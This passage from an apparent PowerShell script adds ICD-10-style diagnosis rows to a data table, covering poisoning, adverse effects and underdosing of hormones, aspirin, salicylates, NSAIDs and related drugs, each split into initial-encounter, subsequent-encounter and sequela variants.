and anabolic congeners, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified hormones and synthetic substitutes, accidental (unintentional)","Poisoning by unspecified hormones and synthetic substitutes, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified hormones and synthetic substitutes, accidental (unintentional)","Poisoning by unspecified hormones and synthetic substitutes, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified hormones and synthetic substitutes, accidental (unintentional)","Poisoning by unspecified hormones and synthetic substitutes, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified hormones and synthetic substitutes, intentional self-harm","Poisoning by unspecified hormones and synthetic substitutes, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified hormones and synthetic substitutes, intentional self-harm","Poisoning by unspecified hormones and synthetic substitutes, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified hormones and synthetic substitutes, intentional self-harm","Poisoning by unspecified hormones and synthetic substitutes, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified hormones and synthetic substitutes, assault","Poisoning by unspecified hormones and synthetic substitutes, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified hormones and synthetic substitutes, assault","Poisoning by unspecified hormones and synthetic substitutes, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified hormones and synthetic substitutes, assault","Poisoning by unspecified hormones and synthetic substitutes, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified hormones and synthetic substitutes, undetermined","Poisoning by unspecified hormones and synthetic substitutes, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified hormones and synthetic substitutes, undetermined","Poisoning by unspecified hormones and synthetic substitutes, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified hormones and synthetic substitutes, undetermined","Poisoning by unspecified hormones and synthetic substitutes, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified hormones and synthetic substitutes","Adverse effect of unspecified hormones and synthetic substitutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified hormones and synthetic substitutes","Adverse effect of unspecified hormones and synthetic substitutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified hormones and synthetic substitutes","Adverse effect of unspecified hormones and synthetic substitutes, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified hormones and synthetic substitutes","Underdosing of unspecified hormones and synthetic substitutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified hormones and synthetic substitutes","Underdosing of unspecified hormones and synthetic substitutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified hormones and synthetic substitutes","Underdosing of unspecified hormones and synthetic substitutes, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by anterior pituitary [adenohypophyseal] hormones, accidental (unintentional)","Poisoning by anterior pituitary [adenohypophyseal] hormones, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anterior pituitary [adenohypophyseal] hormones, accidental (unintentional)","Poisoning by anterior pituitary [adenohypophyseal] hormones, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anterior pituitary [adenohypophyseal] hormones, accidental (unintentional)","Poisoning by anterior pituitary [adenohypophyseal] hormones, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by anterior pituitary [adenohypophyseal] hormones, intentional self-harm","Poisoning by anterior pituitary [adenohypophyseal] hormones, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anterior pituitary [adenohypophyseal] hormones, intentional self-harm","Poisoning by anterior pituitary [adenohypophyseal] hormones, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anterior pituitary [adenohypophyseal] hormones, intentional self-harm","Poisoning by anterior pituitary [adenohypophyseal] hormones, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by anterior pituitary [adenohypophyseal] hormones, assault","Poisoning by anterior pituitary [adenohypophyseal] hormones, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anterior pituitary [adenohypophyseal] hormones, assault","Poisoning by anterior pituitary [adenohypophyseal] hormones, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anterior pituitary [adenohypophyseal] hormones, assault","Poisoning by anterior pituitary [adenohypophyseal] hormones, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by anterior pituitary [adenohypophyseal] hormones, undetermined","Poisoning by anterior pituitary [adenohypophyseal] hormones, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anterior pituitary [adenohypophyseal] hormones, undetermined","Poisoning by anterior pituitary [adenohypophyseal] hormones, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anterior pituitary [adenohypophyseal] hormones, undetermined","Poisoning by anterior pituitary [adenohypophyseal] hormones, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of anterior pituitary [adenohypophyseal] hormones","Adverse effect of anterior pituitary [adenohypophyseal] hormones, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of anterior pituitary [adenohypophyseal] hormones","Adverse effect of anterior pituitary [adenohypophyseal] hormones, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of anterior pituitary [adenohypophyseal] hormones","Adverse effect of anterior pituitary [adenohypophyseal] hormones, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of anterior pituitary [adenohypophyseal] hormones","Underdosing of anterior pituitary [adenohypophyseal] hormones, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of anterior pituitary [adenohypophyseal] hormones","Underdosing of anterior pituitary [adenohypophyseal] hormones, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of anterior pituitary [adenohypophyseal] hormones","Underdosing of anterior pituitary [adenohypophyseal] hormones, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other hormones and synthetic substitutes, accidental (unintentional)","Poisoning by other hormones and synthetic substitutes, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other hormones and synthetic substitutes, accidental (unintentional)","Poisoning by other hormones and synthetic substitutes, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other hormones and synthetic substitutes, accidental (unintentional)","Poisoning by other hormones and synthetic substitutes, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other hormones and synthetic substitutes, intentional self-harm","Poisoning by other hormones and synthetic substitutes, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other hormones and synthetic substitutes, intentional self-harm","Poisoning by other hormones and synthetic substitutes, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other hormones and synthetic substitutes, intentional self-harm","Poisoning by other hormones and synthetic substitutes, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other hormones and synthetic substitutes, assault","Poisoning by other hormones and synthetic substitutes, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other hormones and synthetic substitutes, assault","Poisoning by other hormones and synthetic substitutes, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other hormones and synthetic substitutes, assault","Poisoning by other hormones and synthetic substitutes, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other hormones and synthetic substitutes, undetermined","Poisoning by other hormones and synthetic substitutes, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other hormones and synthetic substitutes, undetermined","Poisoning by other hormones and synthetic substitutes, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other hormones and synthetic substitutes, undetermined","Poisoning by other hormones and synthetic substitutes, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other hormones and synthetic substitutes","Adverse effect of other hormones and synthetic substitutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other hormones and synthetic substitutes","Adverse effect of other hormones and synthetic substitutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other hormones and synthetic substitutes","Adverse effect of other hormones and synthetic substitutes, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other hormones and synthetic substitutes","Underdosing of other hormones and synthetic substitutes, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other hormones and synthetic substitutes","Underdosing of other hormones and synthetic substitutes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other hormones and synthetic substitutes","Underdosing of other hormones and synthetic substitutes, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified hormone antagonists, accidental (unintentional)","Poisoning by unspecified hormone antagonists, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified hormone antagonists, accidental (unintentional)","Poisoning by unspecified hormone antagonists, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified hormone antagonists, accidental (unintentional)","Poisoning by unspecified hormone antagonists, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified hormone antagonists, intentional self-harm","Poisoning by unspecified hormone antagonists, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified hormone antagonists, intentional self-harm","Poisoning by unspecified hormone antagonists, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified hormone antagonists, intentional self-harm","Poisoning by unspecified hormone antagonists, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified hormone antagonists, assault","Poisoning by unspecified hormone antagonists, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified hormone antagonists, assault","Poisoning by unspecified hormone antagonists, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified hormone antagonists, assault","Poisoning by unspecified hormone antagonists, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified hormone antagonists, undetermined","Poisoning by unspecified hormone antagonists, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified hormone antagonists, undetermined","Poisoning by unspecified hormone antagonists, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified hormone antagonists, undetermined","Poisoning by unspecified hormone antagonists, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified hormone antagonists","Adverse effect of unspecified hormone antagonists, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified hormone antagonists","Adverse effect of unspecified hormone antagonists, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified hormone antagonists","Adverse effect of unspecified hormone antagonists, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified hormone antagonists","Underdosing of unspecified hormone antagonists, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified hormone antagonists","Underdosing of unspecified hormone antagonists, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified hormone antagonists","Underdosing of unspecified hormone antagonists, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other hormone antagonists, accidental (unintentional)","Poisoning by other hormone antagonists, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other hormone antagonists, accidental (unintentional)","Poisoning by other hormone antagonists, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other hormone antagonists, accidental (unintentional)","Poisoning by other hormone antagonists, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other hormone antagonists, intentional self-harm","Poisoning by other hormone antagonists, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other hormone antagonists, intentional self-harm","Poisoning by other hormone antagonists, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other hormone antagonists, intentional self-harm","Poisoning by other hormone antagonists, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other hormone antagonists, assault","Poisoning by other hormone antagonists, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other hormone antagonists, assault","Poisoning by other hormone antagonists, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other hormone antagonists, assault","Poisoning by other hormone antagonists, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other hormone antagonists, undetermined","Poisoning by other hormone antagonists, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other hormone antagonists, undetermined","Poisoning by other hormone antagonists, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other hormone antagonists, undetermined","Poisoning by other hormone antagonists, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other hormone antagonists","Adverse effect of other hormone antagonists, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other hormone antagonists","Adverse effect of other hormone antagonists, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other hormone antagonists","Adverse effect of other hormone antagonists, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other hormone antagonists","Underdosing of other hormone antagonists, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other hormone antagonists","Underdosing of other hormone antagonists, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other hormone antagonists","Underdosing of other hormone antagonists, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by aspirin, accidental (unintentional)","Poisoning by aspirin, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by aspirin, accidental (unintentional)","Poisoning by aspirin, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by aspirin, accidental (unintentional)","Poisoning by aspirin, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by aspirin, intentional self-harm","Poisoning by aspirin, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by aspirin, intentional self-harm","Poisoning by aspirin, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by aspirin, intentional self-harm","Poisoning by aspirin, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by aspirin, assault","Poisoning by aspirin, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by aspirin, assault","Poisoning by aspirin, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by aspirin, assault","Poisoning by aspirin, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by aspirin, undetermined","Poisoning by aspirin, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by aspirin, undetermined","Poisoning by aspirin, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by aspirin, undetermined","Poisoning by aspirin, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of aspirin","Adverse effect of aspirin, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of aspirin","Adverse effect of aspirin, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of aspirin","Adverse effect of aspirin, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of aspirin","Underdosing of aspirin, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of aspirin","Underdosing of aspirin, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of aspirin","Underdosing of aspirin, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by salicylates, accidental (unintentional)","Poisoning by salicylates, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by salicylates, accidental (unintentional)","Poisoning by salicylates, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by salicylates, accidental (unintentional)","Poisoning by salicylates, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by salicylates, intentional self-harm","Poisoning by salicylates, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by salicylates, intentional self-harm","Poisoning by salicylates, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by salicylates, intentional self-harm","Poisoning by salicylates, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by salicylates, assault","Poisoning by salicylates, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by salicylates, assault","Poisoning by salicylates, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by salicylates, assault","Poisoning by salicylates, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by salicylates, undetermined","Poisoning by salicylates, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by salicylates, undetermined","Poisoning by salicylates, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by salicylates, undetermined","Poisoning by salicylates, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of salicylates","Adverse effect of salicylates, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of salicylates","Adverse effect of salicylates, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of salicylates","Adverse effect of salicylates, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of salicylates","Underdosing of salicylates, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of salicylates","Underdosing of salicylates, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of salicylates","Underdosing of salicylates, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by 4-Aminophenol derivatives, accidental (unintentional)","Poisoning by 4-Aminophenol derivatives, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by 4-Aminophenol derivatives, accidental (unintentional)","Poisoning by 4-Aminophenol derivatives, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by 4-Aminophenol derivatives, accidental (unintentional)","Poisoning by 4-Aminophenol derivatives, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by 4-Aminophenol derivatives, intentional self-harm","Poisoning by 4-Aminophenol derivatives, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by 4-Aminophenol derivatives, intentional self-harm","Poisoning by 4-Aminophenol derivatives, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by 4-Aminophenol derivatives, intentional self-harm","Poisoning by 4-Aminophenol derivatives, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by 4-Aminophenol derivatives, assault","Poisoning by 4-Aminophenol derivatives, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by 4-Aminophenol derivatives, assault","Poisoning by 4-Aminophenol derivatives, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by 4-Aminophenol derivatives, assault","Poisoning by 4-Aminophenol derivatives, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by 4-Aminophenol derivatives, undetermined","Poisoning by 4-Aminophenol derivatives, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by 4-Aminophenol derivatives, undetermined","Poisoning by 4-Aminophenol derivatives, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by 4-Aminophenol derivatives, undetermined","Poisoning by 4-Aminophenol derivatives, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of 4-Aminophenol derivatives","Adverse effect of 4-Aminophenol derivatives, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of 4-Aminophenol derivatives","Adverse effect of 4-Aminophenol derivatives, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of 4-Aminophenol derivatives","Adverse effect of 4-Aminophenol derivatives, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of 4-Aminophenol derivatives","Underdosing of 4-Aminophenol derivatives, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of 4-Aminophenol derivatives","Underdosing of 4-Aminophenol derivatives, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of 4-Aminophenol derivatives","Underdosing of 4-Aminophenol derivatives, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by pyrazolone derivatives, accidental (unintentional)","Poisoning by pyrazolone derivatives, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by pyrazolone derivatives, accidental (unintentional)","Poisoning by pyrazolone derivatives, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by pyrazolone derivatives, accidental (unintentional)","Poisoning by pyrazolone derivatives, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by pyrazolone derivatives, intentional self-harm","Poisoning by pyrazolone derivatives, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by pyrazolone derivatives, intentional self-harm","Poisoning by pyrazolone derivatives, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by pyrazolone derivatives, intentional self-harm","Poisoning by pyrazolone derivatives, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by pyrazolone derivatives, assault","Poisoning by pyrazolone derivatives, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by pyrazolone derivatives, assault","Poisoning by pyrazolone derivatives, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by pyrazolone derivatives, assault","Poisoning by pyrazolone derivatives, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by pyrazolone derivatives, undetermined","Poisoning by pyrazolone derivatives, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by pyrazolone derivatives, undetermined","Poisoning by pyrazolone derivatives, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by pyrazolone derivatives, undetermined","Poisoning by pyrazolone derivatives, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of pyrazolone derivatives","Adverse effect of pyrazolone derivatives, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of pyrazolone derivatives","Adverse effect of pyrazolone derivatives, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of pyrazolone derivatives","Adverse effect of pyrazolone derivatives, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of pyrazolone derivatives","Underdosing of pyrazolone derivatives, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of pyrazolone derivatives","Underdosing of pyrazolone derivatives, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of pyrazolone derivatives","Underdosing of pyrazolone derivatives, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by propionic acid derivatives, accidental (unintentional)","Poisoning by propionic acid derivatives, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by propionic acid derivatives, accidental (unintentional)","Poisoning by propionic acid derivatives, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by propionic acid derivatives, accidental (unintentional)","Poisoning by propionic acid derivatives, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by propionic acid derivatives, intentional self-harm","Poisoning by propionic acid derivatives, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by propionic acid derivatives, intentional self-harm","Poisoning by propionic acid derivatives, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by propionic acid derivatives, intentional self-harm","Poisoning by propionic acid derivatives, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by propionic acid derivatives, assault","Poisoning by propionic acid derivatives, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by propionic acid derivatives, assault","Poisoning by propionic acid derivatives, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by propionic acid derivatives, assault","Poisoning by propionic acid derivatives, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by propionic acid derivatives, undetermined","Poisoning by propionic acid derivatives, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by propionic acid derivatives, undetermined","Poisoning by propionic acid derivatives, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by propionic acid derivatives, undetermined","Poisoning by propionic acid derivatives, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of propionic acid derivatives","Adverse effect of propionic acid derivatives, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of propionic acid derivatives","Adverse effect of propionic acid derivatives, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of propionic acid derivatives","Adverse effect of propionic acid derivatives, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of propionic acid derivatives","Underdosing of propionic acid derivatives, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of propionic acid derivatives","Underdosing of propionic acid derivatives, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of propionic acid derivatives","Underdosing of propionic acid derivatives, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other nonsteroidal anti-inflammatory drugs [NSAID], accidental (unintentional)","Poisoning by other nonsteroidal anti-inflammatory drugs [NSAID], accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other nonsteroidal anti-inflammatory drugs [NSAID], accidental (unintentional)","Poisoning by other nonsteroidal anti-inflammatory drugs [NSAID], accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other nonsteroidal anti-inflammatory drugs [NSAID], accidental (unintentional)","Poisoning by other nonsteroidal anti-inflammatory drugs [NSAID], accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other nonsteroidal anti-inflammatory drugs [NSAID], intentional self-harm","Poisoning by other nonsteroidal anti-inflammatory drugs [NSAID], intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other nonsteroidal anti-inflammatory drugs [NSAID], intentional self-harm","Poisoning by other nonsteroidal anti-inflammatory drugs [NSAID], intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other nonsteroidal anti-inflammatory drugs [NSAID], intentional self-harm","Poisoning by other nonsteroidal anti-inflammatory drugs [NSAID], intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other nonsteroidal anti-inflammatory drugs [NSAID], assault","Poisoning by other nonsteroidal anti-inflammatory drugs [NSAID], assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other nonsteroidal anti-inflammatory drugs [NSAID], assault","Poisoning by other nonsteroidal anti-inflammatory drugs [NSAID], assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other nonsteroidal anti-inflammatory drugs [NSAID], assault","Poisoning by other nonsteroidal anti-inflammatory drugs [NSAID], assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other nonsteroidal anti-inflammatory drugs [NSAID], undetermined","Poisoning by other nonsteroidal anti-inflammatory drugs [NSAID], undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other nonsteroidal anti-inflammatory drugs [NSAID], undetermined","Poisoning by other nonsteroidal anti-inflammatory drugs [NSAID], undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other nonsteroidal anti-inflammatory drugs [NSAID], undetermined","Poisoning by other nonsteroidal anti-inflammatory drugs [NSAID], undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other nonsteroidal anti-inflammatory drugs [NSAID]","Adverse effect of other nonsteroidal anti-inflammatory drugs [NSAID], initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other nonsteroidal anti-inflammatory drugs [NSAID]","Adverse effect of other nonsteroidal anti-inflammatory drugs [NSAID], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other nonsteroidal anti-inflammatory drugs [NSAID]","Adverse effect of other nonsteroidal anti-inflammatory drugs [NSAID], sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other nonsteroidal anti-inflammatory drugs [NSAID]","Underdosing of other nonsteroidal anti-inflammatory drugs [NSAID], initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other nonsteroidal anti-inflammatory drugs [NSAID]","Underdosing of other nonsteroidal anti-inflammatory drugs [NSAID], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other nonsteroidal anti-inflammatory drugs [NSAID]","Underdosing of other nonsteroidal anti-inflammatory drugs [NSAID], sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antirheumatics, not elsewhere classified, accidental (unintentional)","Poisoning by antirheumatics, not elsewhere classified, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antirheumatics, not elsewhere classified, accidental (unintentional)","Poisoning by antirheumatics, not elsewhere classified, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antirheumatics, not elsewhere classified, accidental (unintentional)","Poisoning by antirheumatics, not elsewhere classified, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antirheumatics, not elsewhere classified, intentional self-harm","Poisoning by antirheumatics, not elsewhere classified, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antirheumatics, not elsewhere classified, intentional self-harm","Poisoning by antirheumatics, not elsewhere classified, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antirheumatics, not elsewhere classified, intentional self-harm","Poisoning by antirheumatics, not elsewhere classified, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antirheumatics, not 